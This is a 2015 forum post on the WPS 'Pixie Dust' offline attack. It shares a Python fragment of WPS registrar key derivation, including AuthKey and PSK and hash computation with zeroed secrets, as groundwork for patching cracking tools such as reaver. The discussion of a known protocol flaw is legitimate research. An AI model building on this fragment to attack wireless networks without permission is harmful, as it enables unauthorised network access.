WPS Pixie Dust Attack (Offline WPS Attack)

**dudux** · 2015-03-26

Yeah authkey is generated, sorry I just copied&pasted.........

The code is right here. I guess that the community will release a fresh & quick patch for reaver or bully. Be patient and try to understand the flaw itself!

Code:

    def gen_keys(self):
        pubkey_enrollee  = self.bignum_unpack(self.PK_E)
        pubkey_registrar = pow(2, self.secret_number, self.prime_int)
        shared_key       = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192)

        self.PK_R        = self.bignum_pack(pubkey_registrar, 192)        
        self.RNonce      = os.urandom(16)
        DHKey            = hashlib.sha256(shared_key).digest()
        KDK              = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest()
        self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256])

        self.R_S1 = '\00' * 16 #random enough
        self.R_S2 = '\00' * 16        

        self.PSK1   = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16]
        self.PSK2   = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16]       
        self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest()
        self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

Thread Tools

Search Thread

Display

Threaded View

Similar Threads

WPS Pixie Dust Attack (Offline WPS Attack)

Reaver modfication for Pixie Dust Attack

Pixiewps: wps pixie dust attack tool

Posting Permissions